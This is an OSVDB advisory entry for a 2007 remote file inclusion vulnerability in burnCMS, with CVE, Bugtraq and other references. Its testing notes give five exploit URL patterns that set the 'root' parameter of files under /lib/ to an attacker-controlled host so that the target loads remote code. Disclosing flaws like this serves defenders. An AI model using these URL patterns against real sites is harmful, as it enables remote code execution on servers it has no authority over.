burnCMS root Multiple Variable Remote File Inclusion

2007-05-05T13:04:34
ID OSVDB:35617
Type osvdb
Reporter OSVDB
Modified 2007-05-05T13:04:34

Description

Manual Testing Notes

Exploit: [target]/lib/authuser.php?root=[attacker]

Exploit: [target]/lib/misc.php?root=[attacker]

Exploit: [target]/lib/connect.php?root=[attacker]

Exploit: [target]/lib/db/mysql.class.php?root=[attacker]

Exploit: [target]/lib/db/postgres.class.php?root=[attacker]

References:

ISS X-Force ID: 33938

Generic Exploit URL: http://www.milw0rm.com/exploits/3809

FrSIRT Advisory: ADV-2007-1557

CVE-2007-2364

Bugtraq ID: 23691